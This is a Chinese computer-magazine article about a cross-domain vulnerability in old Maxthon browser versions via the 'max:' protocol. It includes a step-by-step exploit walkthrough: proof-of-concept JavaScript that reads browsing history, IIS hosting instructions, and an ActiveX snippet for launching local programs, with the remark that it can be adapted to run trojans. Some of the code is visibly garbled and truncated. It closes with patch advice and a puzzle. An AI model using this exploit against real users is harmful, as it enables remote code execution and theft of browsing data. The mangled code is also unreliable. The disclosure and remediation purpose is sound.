傲游漏洞成黑客入侵“后门”
网络安全
在中国,有多少人用傲游浏览器上网?没有人做过统计,但作为主流浏览器用户量巨大是毋庸置疑的。最近傲游出现高危漏洞,黑客可以利用该漏洞远程执行恶意程序,给用户的电脑安全带来莫大的威胁。
最近,国内安全组织发现了傲游在安全处理上存在严重的漏洞,漏洞可以让黑客构建一个特别的恶意网站。如果使用傲游浏览器访问该网站,就会激活漏洞秘密执行黑客设置的命令或程序,例如随意修改傲游用户的浏览器配置、读取用户历史访问记录、远程下载恶意文件、执行恶意构建的脚本。
如果黑客设置的是恶意程序并进入电脑,后果不堪设想。系统可能被破坏或者删除,导致用户无法进入系统;引来盗号病毒,伺机盗取用户的各种账号;系统中的重要文件可能被删除或盗取,造成重大的损失……由于很多人都没有升级浏览器版本的习惯,所以这次傲游漏洞威胁的用户众多,形式不容乐观!
小提示:傲游1.6版本在自动检测升级更新能力方面要大大弱于新版本的傲游2.0版,不能自动升级堵上本次的漏洞。
傲游出现本地跨域漏洞
这一次傲游(含2.0以前的版本)出现漏洞的主要原因在于其选用的IE6内核。傲游所使用的“max:”等域指令等同于IE在本地使用的“file://”,但是傲游没有做相应的限制,导致黑客可以通过“max:”制造跨域攻击(这里可以简单理解为从外部入侵),并能够让傲游用户在本地执行攻击者构建的恶意JavaScript代码。
小知识:基于IE内核的浏览器主要是指以IE为“解读引擎”的浏览器。浏览器最重要或者说最核心的部分是“Rendering Engine”,可以将它理解为“解读引擎”,但是通常多数用户习惯将它称之为“浏览器内核”。这个“解读引擎”或者说“浏览器内核”主要负责对网页中语法的解读,例如HTML、JavaScript或VBScript等,在将语法解读之后,才能够生成出我们看到的网页效果。
简单的说,黑客通过该漏洞可以从网站远程入侵用户本机系统,并远程执行黑客准备的程序,从而实现破坏系统、引来病毒等目的。
傲游跨域攻击利用过程
第一步:首先打开Windows开始菜单中的写字板程序,然后将漏洞利用代码输入到写字板中,将内容另存为test.html。
<a href="">Maxthon Exploit</a>
<script>
function win(){
x=window.open("max:history");
setTimeout(function(){
x.location=new String("javascript:x=maxHistory.history.list.site.loadData();for(i=0;i \");") },3000) } window.onload=function(){ for (i=0;i document.links[i].href="javascript:win()" } } </script> 由于漏洞触发代码需要通过傲游浏览器访问打开,因此需要将test. html上传到网站空间。如果没有网站空间,就需要在本地搭建网络环境,要继续下面的操作。 第二步:要搭建本地网络环境,先检查系统是否已安装IIS。单击“开始”菜单中的“管理工具”,检查是否存在“Internet 信息服务(IIS)管理器 ”,如果没有安装IIS需要单独安装。如果已经安装IIS就启动 IIS 管理器,在左边目录栏中点击右键,在新弹出的菜单中选择“新建→网站”,新建一个网站站点(图1)。 随后在新弹出的“网站创建向导”对话框中点击“下一步”,然后按照提示在“网站描述”中输入任意网站名称后,再点击“下一步”进入“IP地址和端口设置”选项,该项IP地址不用填写,端口如没有特殊要求则保持 80 即可(图2),最后还要任意设置一个域名。 第三步:关闭站点属性配置窗口,回到 IIS 管理器主界面。将test.html漏洞测试文件放到建立站点的WWWROOT目录中。打开傲游浏览器,输入:http://www.domain.com/test.html,点击其中的“Maxthon Exploit”链接傲游漏洞就会激活(图3)。最后,只需要把恶意脚本挂在网站上即可,当漏洞激活时脚本就会执行,此时黑客就可以破坏系统、下载病毒…… 小知识:黑客可以构建出各种JavaScript恶意脚本,例如: <SCRIPT> var shell=new ActiveXObject("shell.ap plication"); shell.namespace("c:\\Windows\\").items().item("Notepad.exe").invokeverb(); </SCRIPT> 该脚本可以让Windwos远程运行本机的写字板程序,自然这段程序修改后也可以用来远程运行危害更大的木马等。 要堵上傲游漏洞,最简单的方法就是升级自己的傲游版本到2.1版(下载地址:http:www.shudoo.com/bzsoft)。此外,也可以手工对傲游浏览器安装目录中的security.src文件进行修改,修改后的文件内容如下所示: var max_security_id=''; if(String(window.document.location).toLowerCase().indexOf('file://')==0){ max_security_id='{02E14D94-53C8-4B6D-89AE-755DC 5299C6C}'; }else{ document.location='about:blank'; } 我们推出黑客小游戏的宗旨就是为了活跃读者的思维,只会用工具的黑客不是真正的黑客,会思考的黑客才是合格的黑客!上期答案见右图。有13个球,其中一个重量与其他的不同,用一台天平找出这个特殊的球,理论上最少要称多少回?如果你想出了答案,请到电脑报论坛http://www.shudoo.com/hd/f/hk.html跟大家分享交流一下。
堵上傲游漏洞
黑客小游戏
